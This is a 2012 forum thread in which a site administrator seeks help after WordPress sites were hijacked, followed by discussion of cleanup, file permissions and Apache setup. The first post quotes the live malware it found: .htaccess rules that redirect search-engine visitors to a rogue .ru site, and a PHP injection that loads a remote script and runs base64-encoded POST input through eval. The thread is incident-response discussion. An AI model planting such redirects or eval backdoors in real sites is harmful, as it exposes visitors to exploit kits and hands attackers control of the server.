PDA

View Full Version : Hijacked wordpress site



Chilling_Silence
08-01-2012, 01:07 PM
Hi all,

Got a problem with a couple of wordpress sites. For some reason when visiting them via a search engine, we're being redirected to a rogue site.
I've found this in the .htaccess:


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveint ernet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|d moz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquic k|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch| pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv)\.(.*)


RewriteRule ^(.*)$ http://byidget.ru/ruby/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline)\.(.*
RewriteRule ^(.*)$ http://byidget.ru/ruby/index.php [R=301,L]

</IfModule>


ErrorDocument 400 http://byidget.ru/ruby/index.php
ErrorDocument 401 http://byidget.ru/ruby/index.php
ErrorDocument 403 http://byidget.ru/ruby/index.php
ErrorDocument 404 http://byidget.ru/ruby/index.php
ErrorDocument 500 http://byidget.ru/ruby/index.php



However for some reason when I still visit the site I'm still being redirected. I've done a bit of a check and I also found this:



cat wordpress/wp-blog-header.php
<?php
// global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43), $_POST[$sessdt_p])));exit;} }

/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/


Looks like somethings not quite right (So I commented that first line out), but I'm not entirely sure where else to go. Is it worth going for a reinstallation of wordpress and just pulling the db across?

Any ideas?

Thanks


Chill.

fred_fish
08-01-2012, 01:30 PM
If it was me:

1. A Wordpress install looks like a bowl of spaghetti.
2. The hacker knows it a hell of a lot better than me.

I would nuke it from orbit.

Chilling_Silence
08-01-2012, 01:37 PM
Yeah was kinda figuring that would be the way to go :-/

Time for a re-install then I s'pose, wish me luck ;)

lakewoodlady
08-01-2012, 05:52 PM
Is the hijack with wordpress.com or wordpress.org?

LL

Chilling_Silence
08-01-2012, 07:07 PM
It's a couple of custom-hosted sites using the opensource wordpress :)

lakewoodlady
08-01-2012, 07:19 PM
It's a couple of custom-hosted sites using the opensource wordpress :)

In that case, wordpress probably won't want to know. :(

somebody
08-01-2012, 07:22 PM
I've seen something similar, and it was very difficult to remove (there is code hidden in various places that will re-infect what you've already cleaned up!!!). If you have a known good backup of both the db and the files, restore, otherwise you will want to reinstall.

Chilling_Silence
09-01-2012, 04:25 PM
Turns out its on most of my wordpress sites, on a couple of different hosts, using a variety of themes from different places (Some were standard themes) and some with different (Some with none) plugins.

Gonna be a *long* night methinks :(

somebody
09-01-2012, 08:05 PM
Ouch - good luck.

Chilling_Silence
09-01-2012, 09:18 PM
OK so yeah long story short there was a shared-hosting user with two sites on it.
I fixed up Site A and got it all back up, nuked wordpress and started over, cleared *all* the .haccess files that user account had access to, changed the ssh / ftp / website / mysql passwords, changed the auth keys / salts, and everything was looking fine. I was going to fix up the second site a short while after.

Took a break for dinner, came back and the .htaccess files where back again. The sites .php files hadn't been infected though thankfully, nor the database. This happened twice, until I cottoned on until what was happening. I removed the site entirely and it's been fine now for 4 hours (Previously it was infected within half an hour of being cleaned.

All this appears to have happened around the 4th, the day after the new Wordpress came out that apparently fixed the vulnerabilities, coz from what I can tell based on the plugins / themes in use across my different Wordpress sites, it wasn't any of them, but Wordpress itself.
Lucky me ...

Chilling_Silence
09-01-2012, 10:37 PM
Just saying, this *really* sucks. If you've got any wordpress sites, nows the perfect time to check them. Some of my sites are fine. Others aren't. Multiple hosts, some infected on the same shared-hosting server, while others aren't... Can only point to Wordpress as the common denominator?

Oh the joys of being involved in 'the interwebz' ...

EDIT: 1 down, around a dozen (That I know of) to go :(

fred_fish
10-01-2012, 12:11 AM
http://www.google.co.nz/search?hl=en&q=http%3A%2F%2Fbyidget.ru%2Fruby%2Findex.php

You're not alone, but you seem to be in on the ground floor. :(

Might be this?
http://threatpost.com/en_us/blogs/compromised-wordpress-sites-redirecting-black-hole-exploit-kit-servers-110211

jcr1
10-01-2012, 08:03 AM
That's a worry:horrified

The server that I built, for https etc. runs wordpress. Just so I can give a decent sort of look to the photo galleries I show (produced with jalbum).
I only give access to family members to view (I guess it's done as much for my amusement as their benefit) and I've tried to keep away from search engines.
Do you think this should be something I should be concerned about? Particularly as I'm running the photo galleries off my own home server.

Chilling_Silence
10-01-2012, 08:20 AM
If it's available online, then yeah, make sure you're running the latest wordpress at least :)

Chilling_Silence
10-01-2012, 08:23 AM
http://www.google.co.nz/search?hl=en&q=http%3A%2F%2Fbyidget.ru%2Fruby%2Findex.php

You're not alone, but you seem to be in on the ground floor. :(

Might be this?
http://threatpost.com/en_us/blogs/compromised-wordpress-sites-redirecting-black-hole-exploit-kit-servers-110211

Interesting. There's been a variety of these "Google WP redirect" exploits in the past. Guess its just another one to add to the list... Half the sites at least were running 3.3.0, and they were taken over only the day after that 3.3.1 came out :(
Some of them were 'reinfected' this time redirecting to cleardot.ru instead. Gonna be a long day methinks.

pctek
10-01-2012, 09:17 AM
We see hacked Wordpress all the time. I have since come to the conclusion PHP is crap, it's the most hackable thing out there.

Here's the latest:

there are lot of sites using TimThumb.php file. It is used primarily by Wordpress module / theme developers to resize an image on fly. It is used by other developers and other CMSs like OsCommerce as well. This php file (old version) is used by hackers to upload their scripts to the server for various malicious activities.

So, if you use this - update it or ditch it. Although - then there will be the next thing exploited......pretty endless - about as useful as patching WIndows.........

Chilling_Silence
10-01-2012, 09:57 AM
I'm not sure I follow that logic. It's like saying that programming in C or C++ is crap because it's what Windows ME was written in.

I've not been able to find that TimThumb included in wordpress, I was under the impression it used the GD Image Library to do it?

Also, the update came out less than 24 hours before the sites were hit, not really much of a chance to do the upgrade really... :-/

Chilling_Silence
10-01-2012, 01:12 PM
New .htaccess files are now pointing to balance-current.ru/access/index.php

Super, the fun never ceases ... :-/

fred_fish
10-01-2012, 01:26 PM
We see hacked Wordpress all the time. I have since come to the conclusion PHP is crap, it's the most hackable thing out there.
Crap is maybe a bit harsh ... The Register reports it (http://www.theregister.co.uk/2009/08/12/wordpress_password_reset_bug/) being described thusly
The bigger point he and other observers seem to make is that PHP is the coding equivalent of an everyman's jet pack. It allows him to quickly soar into the sky with a minimal amount of training but doesn't necessarily provide the means to check for buildings, planes or other hazards that may greet the user once he gets there.:lol:

Chilling_Silence
10-01-2012, 01:33 PM
Well I'll be damned ... Cleaned a user account with a single wordpress install, restored from a full backup. Came back 3-4 minutes later (left it extracting) and it was already hacked again. Second time it worked and was able to upgrade wordpress successfully without any issues before they were able to re-infect it. Man what a mission this is proving to be!!! Especially where the user account has a couple of sites hosted :-/

EDIT: http://codex.wordpress.org/Version_3.3.1

From the announcement post: "This maintenance release fixes 15 issues with WordPress 3.3, as well as a fix for a cross-site scripting vulnerability that affected version 3.3. Thanks to Joshua H., Hoang T., Stefan Zimmerman, Chris K. and the Go Daddy security team for responsibly disclosing the bug to our security team."

%@#$

pctek
10-01-2012, 03:10 PM
I'm not sure I follow that logic. /
The logic - Windows is always having updates released to fix vulnerabilities right? PHP is too. It doesn't stop the hacking attempts and the updates go on and on....that's what I mean....an endless process. Fix one and there's another along next day...

Chilling_Silence
10-01-2012, 03:15 PM
No, PHP isn't, software that's written using PHP is. Just like "C" isn't having security updates all the time.

jcr1
10-01-2012, 06:19 PM
No, PHP isn't, software that's written using PHP is. Just like "C" isn't having security updates all the time.

So, the logic is, PHP is there to develop software. Then it's the responsibility of developers to look carefully at the security of what they're developing - the finished product?

Chilling_Silence
11-01-2012, 08:29 AM
Bingo! :)

jcr1
11-01-2012, 10:14 AM
Another question if I may?
I have it in my mind, that with the likes of programming languages such as c++, where ever the application or website goes then that code is dragged along with it.
But with PHP it triggers off a connection to a data base, that holds all sorts of amazing stuff, on a remote server.
Is that a fair assessment, or a bit simplistic?

Chilling_Silence
11-01-2012, 10:41 AM
Well C is compiled code, PHP isn't. No database required, it's usually used as a server-side scripting language to tell the web server "This is how you display X".

So in this instance, PHP is used in wordpress to say "Is the referrer a Google search page?", if yes, then it sends your browser the code for "301 permanently moved". If not, then it displays your website as-per normal.

It's not quite an apples and oranges comparison between C and PHP, but it's close enough ;)

jcr1
11-01-2012, 01:20 PM
Thanks Chill.
I'd like to learn a bit more about programming, instead of just copying and pasting simple html etc.
Especially since I now am not involved so much with community stuff; gives me more thinking time.
I mentioned wordpress vulnerabilities to my son in the UK - without being too specific about the contents of this thread, so his reply is I guess, generalisations.
"The issue of wordpress security is generally down to poor setup, its easy to just set dirs to 777 rather than apply the right groups etc. I use WP and have no real issues with it.........."
He has offered to help me with a bespoke site, if I want to ditch wordpress and I guess he might feel that's the way I possibly should go, as he has said that WP is not ideal for displaying photo albums. Although, in saying that, I got around that one by simply just linking to my jalbum albums from links in the WP sidebar (widgets).
Phew, this thread has got me thinking.

Chilling_Silence
11-01-2012, 02:14 PM
Yeah luckily I've setup a number of them. You've *got* to have write access to certain files to be able to modify them when you install things like plugins etc, or in the case of one of the site we had to modify the headers and things in order to install flowplayer for video hosting / streaming.

PHP's actually a *real* cool and flexible language, combined with some basic HTML knowledge and I find it makes web dev a whole lot easier and more powerful!

jcr1
11-01-2012, 05:20 PM
My son is actually a bit of a fan of PHP, has been since his AUT days. He was actually quite surprised at "Kev the computer guy"'s attitude to the thought that I might want a LAMP server (I guess he's got enough to think about with guiding people like me through building a secure server). That data base setup stuff though, it's a study all in itself, let alone PHP and Apache. For a few years I've been using software, on various servers, and more recently on my Synology NAS, called "Simple Invoices", which needs a LAMP setup. So I've installed it, and used it, but feel I lack understanding - but it works:eek:

As regards permissions, WP, on my server is 755 and that applies to the major folders such as admin, content and includes but drops to 644 on index.php
and 666 on config.php. So, it appears it's more secure than the example of 777 that Steve was using. I just wonder if I should tighten it up a bit more with making it's group root, instead of www-data. Mind you I wouldn't want to muck up anything I can do with Filezilla (sftp); I can always change it back I guess - Webmin is pretty cool:thumbs:

Another question, yet again (I hope I'm not too tedious here), Chill, have you done anything with Apache rewrite rules? I want to simplify the web address for the Wordpress site and Steve reckons I can do it using the above i.e. simpler web address for the whole world (well family members I chose anyway) and I know what the real address is.

Chilling_Silence
13-01-2012, 06:57 AM
Yeah but the thing is visitors don't magically have write access to the server, the only time you *would* is if the software you're running is flawed enough (As this bug apparently in WP is) to allow the user to do-so.

You don't need to mess with mod_rewrite for what you want, if you've only got one website then it'll be the 'default' that apache serves up if you have vhosts turned on no doubt (vhosts allows you to host different sites from the one PC, for example it knows if your gues wants to go to pressf1.co.nz vs pcworld.co.nz (They're not on the same server but I forget the other site that's on this PF1 server). This means that all you need is some description of dynamic DNS to point it to your home IP Address. Usually your router will support the likes of dyndns.org or no-ip.com so check in your router coz it'll be easiest to get your router to update a dynamic DNS service if it supports it :)

Just a bit of an update, I had a few of my *own* on a share-hosting server. Forgot that I had a wordpress install in one of the subfolders somewhere on a testing domain. Long story short reinfected the whole bloody lot of about 7 sites I host from that one share hosting. Was not a happy chappy, but I seem to have cleaned it all up now. Only have about two left of other peoples to clean up now :D

fred_fish
13-01-2012, 09:16 AM
As regards permissions, WP, on my server is 755 and that applies to the major folders such as admin, content and includes but drops to 644 on index.phpand 666 on config.php. So, it appears it's more secure than the example of 777 that Steve was using. I just wonder if I should tighten it up a bit more with making it's group root, instead of www-data. Mind you I wouldn't want to muck up anything I can do with Filezilla (sftp); I can always change it back I guess - Webmin is pretty cool:thumbs:The problem there is that www-data (the user that apache is running as) has read and write access to it all, so someone exploiting a "feature" of your WP can then alter ANY of the config files in your webroot. So YES change the owner to root (or at least not www-data) and I would change the permissions on config.php to remove write access from 'group' & 'world". You WILL need to have some area's writeable but I don't know what they are for WP.


Another question, yet again (I hope I'm not too tedious here), Chill, have you done anything with Apache rewrite rules? I want to simplify the web address for the Wordpress site and Steve reckons I can do it using the above i.e. simpler web address for the whole world (well family members I chose anyway) and I know what the real address is.As per what Chill said, change your_vhost_label.conf to point '/' at the actual WP dir instead of /var/www/

edit: And yes Webmin is pretty cool, until you discover how shitty it is ... :)

Chilling_Silence
13-01-2012, 10:28 AM
Permissions are not the issue though, the point is the web server daemon user has to have access to the files / folders in order to edit the configs etc, it's that software has allowed a malicious user to write to it and edit things that should be checked and validated but they weren't. Changing permissions to remove group and world only means that a non-www user on the server can't access it, but some of the hackings occured on my own private servers where I'm the only user account, with no passwords allowed via SSH, so it's *not* a permissions issue.

fred_fish
13-01-2012, 10:50 AM
Yeah that's my point. You should be able to set it up, get the config sorted, then lock the files. All the dynamic content should be stored in the db (with appropriate validation).
If WP needs constant write access to everything, that would explain why it is such a big target.

Chilling_Silence
13-01-2012, 10:55 AM
It doesn't need it to everything, but the ability to modify certain files is crucial, things like themes and whatnot. If I wanna add in something to the HTML Header for flowplayer, I need to be able to do-so. Same for Google Analytics which likes to be in the footer.

fred_fish
13-01-2012, 11:09 AM
Yes, but the HTML is generated 'on the fly' by PHP no?
Therefore, the headers, footers & anything else sent to the client browser could be pulled from the db.
In any case, write access should be restricted to specific dirs.
I still fail to see why the web server process needs write access to the likes of the .htaccess files.

Chilling_Silence
13-01-2012, 11:20 AM
No, it's not, there's a 'template'.

It needs to be able to write the likes of .htaccess files so that you can rewrite the way that URLs are presented. If you don't like /blog/id=1425 but would prefer /blog/how-to-configure-esx-windows7/ then it can do that for you.

fred_fish
13-01-2012, 11:23 AM
Ah, OK - so, 'broken by design' then ... :)

Chilling_Silence
13-01-2012, 11:49 AM
;) potato / potatoe

:D

stu161204
13-01-2012, 04:41 PM
Thanks for posting about this Chill :), I have just come back from holiday so I better check out all the wordpress sites I have worked on to see if any of them have been Hijacked!

Chilling_Silence
14-01-2012, 07:10 AM
Apparently the vulnerability was introduced in 3.3.0, and earlier versions aren't affected.

Iantech
14-01-2012, 08:40 AM
So, if I understand this correctly, once WP has created the .htaccess file, does it need to modify it at various times? Why cant you chmod it to 664 or totally read only and stop it being modified?

pctek
14-01-2012, 01:35 PM
Chill knows more about this than me, but I'll tell you how work rules.
You can have Wordpress on Webdrive but they don't recommend it as the permissions are different. You'd have to 777 stuff to allow the PHP writing due to some stuff about the environment I don't get yet.. Which is being changed apparently....

So they encourage Openhost instead. Permissions are generally 755 by default, lots of stuff there is locked down, customers can't alter safemode, himem, can't unzip and so on, We have to do it for them.

It doesn't make Wordpress totally secure, it still can get hacked - theres the Tim Thumb vulnerability at present e're telling customers to fix.

But it's more secure there, so long as it's kept up to dat, all these mods and things are updated too. There are certain ones that won't work on our servers, due to whats locked down on them there. Tough luck, you use something else or go elsewhere.

Chilling_Silence
14-01-2012, 07:30 PM
mmmm not quite that simple, and they're mis-guided with webdrive vs openhost, or are mis-guiding you at least. You never have to set permissions to 777, that's global read, write & execute.

pctek
15-01-2012, 08:45 AM
I know what 777 is. As I said, don't understand it all yet. They do recommend OH over WD for it though. I forget the issue with WD, I'll ask again Monday.

jcr1
15-01-2012, 08:57 AM
The problem there is that www-data (the user that apache is running as) has read and write access to it all, so someone exploiting a "feature" of your WP can then alter ANY of the config files in your webroot. So YES change the owner to root (or at least not www-data) and I would change the permissions on config.php to remove write access from 'group' & 'world". You WILL need to have some area's writeable but I don't know what they are for WP.
Maybe safer to just replace the WP site with something written from scratch (mind you the jalbum albums are fine, it's just that a website for a first page looks a lot better than "Index of Photosite"), then at least owner & group can be what I chose, which retains the security, which was the reason I started the project.
As per what Chill said, change your_vhost_label.conf to point '/' at the actual WP dir instead of /var/www/

edit: And yes Webmin is pretty cool, until you discover how shitty it is ... :)
Point taken, thanks, about Chill's advice.
When I get to the stage where I find out about webmin; what do you think could be a better way to go? Kev, who ran me through the tutorial always intimates that we could find the "command line" better.

jcr1
15-01-2012, 09:09 AM
Yeah but the thing is visitors don't magically have write access to the server, the only time you *would* is if the software you're running is flawed enough (As this bug apparently in WP is) to allow the user to do-so.

You don't need to mess with mod_rewrite for what you want, if you've only got one website then it'll be the 'default' that apache serves up if you have vhosts turned on no doubt (vhosts allows you to host different sites from the one PC, for example it knows if your gues wants to go to pressf1.co.nz vs pcworld.co.nz (They're not on the same server but I forget the other site that's on this PF1 server). This means that all you need is some description of dynamic DNS to point it to your home IP Address. Usually your router will support the likes of dyndns.org or no-ip.com so check in your router coz it'll be easiest to get your router to update a dynamic DNS service if it supports it :)
Router supports dyndns, I use it. Just had a think about it; it probably won't work as I've allocated "users", their own websites, so if I configure the router to go to the simpler URL, the other users would be shut out?


Just a bit of an update, I had a few of my *own* on a share-hosting server. Forgot that I had a wordpress install in one of the subfolders somewhere on a testing domain. Long story short reinfected the whole bloody lot of about 7 sites I host from that one share hosting. Was not a happy chappy, but I seem to have cleaned it all up now. Only have about two left of other peoples to clean up now :D
All the best with this one Chill:D

Chilling_Silence
15-01-2012, 09:09 PM
Can you explain what you've given the users already?

If I understand you correctly, everything should work OK still...

jcr1
15-01-2012, 09:50 PM
I figured that if my DynDNS was set to say joeblog.dyndns.org and the wordpress site's URL is joeblog.dyndns.org/gallery/wordpress and I want to shorten that to joeblog.dyndns.org/photos, then when I set DynDNS, in router to joeblog.dyndns.org/photos. Then wouldn't that cancel out;
joeblog.dyndns.org/gallery/
joeblog.dyndns.org/photosite/
joeblog.dyndns.org/favourite son/
joeblog.dyndns.org/silly old fool/
etc.?
Anyway Chill, this is just academic, but I'd still like to know:lol:

fred_fish
15-01-2012, 10:32 PM
DNS (dynamic or otherwise) only maps the domain name (joeblog.dyndns.org) to your IP address.

You could change the vhost.conf to set the / (what gets served when you go to http://joeblog.dyndns.org/) to /var/www/gallery/wordpress/ but, yes that would break the others.

What you could do (if you are paying for the DNS) is set A records for gallery.joeblog.dyndns.org & wordpress.joeblog.dyndns.org etc. all pointing to the same IP, and have separate vhosts pointing to the appropriate directory.

Yet another option might be simply to use a symlink to shorten the path thusly:
ln -s /var/www/gallery/wordpress /var/www/wordpress

pctek
16-01-2012, 01:26 PM
Chill - it's because they haven't got su php on WD yet, only on OH.
Being changed but a bit of a major due to the numbers on WD, and they have to be down or moved before the servers cna be chnaged.

Chilling_Silence
16-01-2012, 04:24 PM
I'm sure it can still work though, regardless of that, so I dunno what the big issue is?